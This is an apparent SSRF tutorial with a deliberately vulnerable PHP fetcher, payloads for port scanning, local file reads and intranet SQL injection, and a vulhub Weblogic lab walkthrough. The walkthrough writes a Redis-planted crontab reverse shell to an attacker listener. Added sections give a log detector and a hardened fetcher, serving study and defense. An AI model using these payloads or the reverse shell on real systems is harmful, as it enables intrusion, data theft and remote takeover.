Server-side request forgery (SSRF) and vulnerability recurrence

Server request forgery

1. Overview

Many web applications send an HTTP request to a URL submitted by the user: given that URL, the application fetches an image, a file or some other resource on the user's behalf. A typical example is Baidu's image recognition function.

If the URL submitted by the user, and the information returned by the remote server, are not properly verified or filtered, a "request forgery" defect may exist. As the name suggests, in request forgery the attacker forges what looks like a normal request in order to carry out an attack. When the forged request is issued by the server, the vulnerability is called server-side request forgery (Server Side Request Forgery, or SSRF for short).

SSRF is an attack in which the attacker forges the requests that the server sends.

1.1 SSRF scenario

1.1.1 PHP Principle

curl (a command-line tool) and wget are both command-line HTTP clients: they fetch resources the way a browser does.

curl downloads a network resource with: curl <resource address> -O

wget downloads a network resource with: wget <resource address>

Implementing the fetch with curl in PHP requires the curl PHP extension.

<?php
// ssrf_curl.php: the deliberately vulnerable fetcher used throughout this article

if (isset($_REQUEST['url'])) // Was a url parameter submitted? Otherwise show the usage hint
{
    $link = $_REQUEST['url'];                   // The user-supplied URL is used as-is: no scheme, host or port check
    $fileName = './curled/' . time() . ".txt";  // The response is stored in the curled folder
    $curlObj = curl_init($link);                // Initialise a curl handle for the submitted URL
    $fp = fopen($fileName, 'w');

    curl_setopt($curlObj, CURLOPT_FILE, $fp);            // Write the response body into $fp
    curl_setopt($curlObj, CURLOPT_HEADER, 0);
    curl_setopt($curlObj, CURLOPT_FOLLOWLOCATION, TRUE); // Redirects are followed, so a redirect target is fetched too

    curl_exec($curlObj);                        // The server makes the request on the user's behalf
    curl_close($curlObj);
    fclose($fp);

    if (getimagesize($fileName))                // Serve images with an image content type
    {
        header("Content-Type:image/png");
    }

    $fp = fopen($fileName, 'r');
    $size = filesize($fileName);
    $result = $size > 0 ? fread($fp, $size) : ''; // fread() with length 0 is an error, e.g. when the target sent nothing
    fclose($fp);
    echo $result;                               // The fetched content is echoed back unfiltered
}
else
{
    echo "?url=[url]";
}

?>

Copy the above code to the server where phpstudy is deployed

Use a browser to access the curl.php web page

Then enter ?url=http://www.baidu.com/img/PC_wenxin_1142bc061306e094e6eddaa3d9656145.gif

When we submit a URL to the server, the server sends a request (most of the time a GET request) on our behalf. If the request is malicious and the server cannot recognise it as such, there is a server-side request forgery (SSRF) vulnerability. If the attacker uses SSRF as a stepping stone for other attacks (submitting the URL to the vulnerable server so that it sends the HTTP requests to the real victim on the attacker's behalf), the victim only sees the vulnerable server in its logs, and tracing the attack back to the attacker becomes difficult.

1.2 SSRF Principle

The server accepts a URL from the client and sends the request to that URL itself.

The URL entered by the user is not properly filtered, so an arbitrary URL can be requested.

The response is not checked and is output directly.

1.3 SSRF Hazards

  • Port scanning;

  • Intranet web application fingerprinting;

  • Attacking intranet applications;

  • Reading local files.

2. SSRF attack and defense

CTF: CTFHub

2.1 SSRF Exploitation

2.1.1 File access

?url=http://www.baidu.com
?url=http://www.baidu.com/img/bd_logo.png
?url=http://www.baidu.com/robots.txt

What we see is not the real Baidu web page served by Baidu: the site we are actually connected to is 192.168.16.136. The URL is submitted through the curl.php script, which fetches the content at that URL and presents it to us.

2.1.2 Port Scan

?url=http://127.0.0.1:80
?url=http://127.0.0.1:3306
?url=dict://127.0.0.1:3306

?url=http://10.10.10.1:22
?url=http://10.10.10.1:6379

2.1.3 Reading local files

?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd

?url=file:C:\phpStudy_20161103\WWW\ssrf\curl.php

2.1.4 Intranet application fingerprint identification

Some applications are deployed on the intranet.

<Directory "C:\phpStudy_20161103\WWW\phpMyAdmin">
#Order allow,deny
Order deny,allow
deny from all
allow from 127.0.0.1

</Directory>

Modify httpd.conf by copying the above block into it, after the DocumentRoot (document root directory) setting.

After modifying httpd.conf, restart phpstudy and access the local address on other clients again.

Then only 127.0.0.1 will be allowed to access phpmyadmin

Intranet application fingerprint recognition.

?url=http://127.0.0.1/phpmyadmin/readme

2.1.5 Attacking intranet web applications

Intranet security is often weak.

Access to the intranet can be achieved through SSRF vulnerabilities, allowing intranet applications to be attacked. There are many intranet web applications that can be attacked only through the GET method.

Set cms to only allow 127.0.0.1 access

<Directory "C:\phpStudy_20161103\WWW\cms">
#Order allow,deny
Order deny,allow
deny from all
allow from 127.0.0.1

</Directory>

Access cms through ssrf

?url=http://127.0.0.1/cms/show.php?id=-33%20union%20select%201,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15%20from%20cms_users

?url=http://127.0.0.1/cms
?url=http://127.0.0.1/cms/show.php?id=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

If plain spaces are used as separators, the request errors and nothing is echoed; use /**/ in place of spaces.
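A detection-side counterpart to the probes above, added here and not part of the original article: it pulls the url= parameter out of web-server access-log lines and flags the non-http schemes, loopback or intranet targets, and unusual ports shown in sections 2.1.2 to 2.1.5. The file name and the log lines are constructed for the example.

```php
<?php
// ssrf_log_check.php (assumed name): flag access-log requests whose url= parameter looks like
// an SSRF probe of the kinds shown in section 2.1 (non-http schemes, loopback or intranet
// targets, unusual ports). Nothing here is fetched; it only inspects log text.

function ssrf_indicators(string $logLine): array {
    // Pull the url= query parameter out of the quoted request line and decode it.
    if (!preg_match('/"(?:GET|POST) [^ ]*[?&]url=([^ &"]+)/', $logLine, $m)) return [];
    $p = parse_url(urldecode($m[1])) ?: [];
    $hits = [];
    $scheme = strtolower($p['scheme'] ?? '');
    if ($scheme !== '' && !in_array($scheme, ['http', 'https'], true)) $hits[] = "scheme:$scheme";
    $host = trim($p['host'] ?? '', '[]');          // file:///etc/passwd has no host; the scheme hit covers it
    if ($host !== '') {
        $isIp = filter_var($host, FILTER_VALIDATE_IP) !== false;
        // A valid IP that fails the private/reserved-range filters is loopback, link-local or RFC 1918.
        $isInternal = $isIp && filter_var($host, FILTER_VALIDATE_IP,
            FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false;
        if ($isInternal || $host === 'localhost') $hits[] = "internal-host:$host";
    }
    $port = $p['port'] ?? null;
    if ($port !== null && !in_array($port, [80, 443], true)) $hits[] = "port:$port";
    return $hits;
}

// Returns [line, indicators] for every line that raised at least one indicator.
function scan_log(array $lines): array {
    $alerts = [];
    foreach ($lines as $line) {
        $hits = ssrf_indicators($line);
        if ($hits !== []) $alerts[] = [$line, $hits];
    }
    return $alerts;
}

// Constructed sample lines in Apache combined format; the first one is a benign fetch.
$sampleLog = [
    '192.168.16.1 - - [04/Sep/2023:16:38:27 +0800] "GET /ssrf/curl.php?url=http://www.baidu.com/robots.txt HTTP/1.1" 200 2781',
    '192.168.16.1 - - [04/Sep/2023:16:40:02 +0800] "GET /ssrf/curl.php?url=dict%3A%2F%2F127.0.0.1%3A3306 HTTP/1.1" 200 118',
    '192.168.16.1 - - [04/Sep/2023:16:46:27 +0800] "GET /ssrf/curl.php?url=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1640',
    '192.168.16.1 - - [04/Sep/2023:17:00:56 +0800] "GET /ssrf/curl.php?url=http://10.10.10.1:22 HTTP/1.1" 200 0',
];
foreach (scan_log($sampleLog) as [$line, $hits]) {
    echo "ALERT [" . implode(', ', $hits) . "] " . $line . "\n";
}
```

A url value containing an unencoded & is cut at that character by the regex, which is acceptable for an alerting rule but should be kept in mind when tuning it.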

2.2 SSRF Example

Weblogic SSRF to GetShell

cd to vulhub/weblogic/ssrf

sudo docker-compose up -d

Access port 7001 of the local machine address

access

http://192.168.16.176:7001/uddiexplorer/SearchPublicRegistries.jsp

Click search, capture the packet with Burp Suite (bp), send the request to Repeater and click Send.

The error message contains www-3.ibm.com, and the operator parameter submitted in the POST request body also contains www-3.ibm.com as part of a URL, so there is likely to be an SSRF vulnerability here.

Then generate a domain name in dnslog and test whether the operator parameter makes a request to the URL it contains (that is, whether the data submitted in operator is resolved by the server).

This proves that the operator parameter makes a request to the URL in its content.

Change the URL to 127.0.0.1 and test again

It is known that port 80 is not open

Testing ports 7001 and 7002

To probe local ports, note that the target is generally a docker environment. Intranet IP ranges used by docker: 172.16.0.1, 172.17.0.1, 172.18.0.1, 172.19.0.1

172.16.0.1:7001, 172.17.0.1:7001, 172.18.0.1:7001 and 172.19.0.1:7001 all give the same result, indicating that 172.16, 172.17, 172.18, 172.19 and 172.20 all have port 7001 open

However, 172.20.0.2 does not open port 7001, but may open other ports.

With Redis reachable, the SSRF can be used to read data, write data, write an SSH public key, obtain a webshell, or plant a periodic scheduled task. Because ports 80 and 22 are not open and there is no echo, try writing a periodic scheduled task to obtain a shell.

Listen on port 21 with netcat (the "Swiss Army knife"):

nc -lnvp 21

set 1 "\
\
\
\
0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.16.176/21 0>&1'\
\
\
\
"
config set dir /etc/
config set dbfilename crontab
save

Because scheduled tasks need to be submitted through http, the scheduled tasks are URL-encoded.

set 1 "\
\
\
\
0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.16.176/21 0> &1'\
\
\
\
"config set dir /etc/config set dbfilename crontabsave
http://172.20.0.2:6379/xjset 1 "\
\
\
\
0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.16.176/21 0>&1'\n\
\
\
"config set dir /etc/config set dbfilename crontabsavexj

Click submit, then receive the reverse shell from the docker container

2.3 SSRF Defense

2.3.1 Filter input

  • Restrict protocols: allow only http or https;
  • Restrict IPs: prevent the application from being used to reach intranet addresses and attack the intranet;
  • Restrict ports: allow requests only to commonly used ports.

2.3.2 Filter output

  • Filter the returned information and drop everything that does not meet the requirements;
  • Unify error messages so that an attacker cannot infer intranet information from them.
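Applying these four defenses to the fetcher from section 1.1.1, as an added example that is not part of the original article: the file name ssrf_curl_hardened.php, the port allowlist of 80 and 443, and the accepted image types are assumptions, and the fileinfo extension is assumed to be loaded.

```php
<?php
// ssrf_curl_hardened.php (assumed name): hardened rewrite of the fetcher in section 1.1.1.
// Reject private (10/8, 172.16/12, 192.168/16, fc00::/7) and reserved (0/8, 127/8, 169.254/16,
// ::1, fe80::/10 ...) addresses so the server cannot be pointed at itself or the intranet.
function is_public_ip(string $ip): bool {
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}
// Returns the vetted target (url, host, port, ip) or null when the URL must be rejected.
function validate_url(string $url): ?array {
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) return null;
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) return null;  // no file://, dict://, gopher://
    if (isset($p['user']) || isset($p['pass'])) return null;       // no http://trusted@127.0.0.1/ tricks
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) return null;            // no 22, 3306, 6379, 7001 ...
    $host = trim($p['host'], '[]');                                // IPv6 literals arrive bracketed
    // Resolve once and vet every address (gethostbynamel() returns A records only, so IPv6-only
    // names are rejected; numeric forms such as 2130706433 resolve to 127.0.0.1 and fail the check).
    $ips = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : (gethostbynamel($host) ?: []);
    if ($ips === []) return null;
    foreach ($ips as $ip) { if (!is_public_ip($ip)) return null; }
    return ['url' => $url, 'host' => $host, 'port' => $port, 'ip' => $ips[0]];
}
// Redirects are disabled (a 302 to an intranet address would bypass validate_url) and the
// connection is pinned to the vetted IP, so a second DNS answer (rebinding) cannot redirect it.
function safe_fetch(array $t): ?string {
    $ch = curl_init($t['url']);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10,
        CURLOPT_MAXFILESIZE    => 5 * 1024 * 1024,
        CURLOPT_RESOLVE        => ["{$t['host']}:{$t['port']}:{$t['ip']}"],
    ]);
    $body = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return ($body !== false && $status === 200) ? $body : null;
}
if (!isset($_REQUEST['url'])) { echo "?url=[url]"; exit; }
$target = validate_url($_REQUEST['url']);
$body = $target ? safe_fetch($target) : null;
// Filter the output: pass only a real image through, and return one uniform error for every
// failure so the response does not reveal which intranet hosts or ports exist.
$mime = $body !== null ? (new finfo(FILEINFO_MIME_TYPE))->buffer($body) : '';
if (!in_array($mime, ['image/png', 'image/jpeg', 'image/gif'], true)) { http_response_code(400); exit('rejected'); }
header('Content-Type: ' . $mime);
echo $body;
```

If the application must follow redirects, re-run validate_url on each Location header instead of re-enabling CURLOPT_FOLLOWLOCATION.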

3. SSRF mining

Web functions worth testing:

  • Share
  • Transcoding service
  • Online translation
  • Image loading and downloading
  • Picture and article collection function
  • Unpublished API implementation

URL keywords to look for in parameters:

  • share
  • wap
  • url
  • link
  • src
  • source
  • target
  • u
  • 3g
  • display
  • sourceURL
  • imageURL
  • domain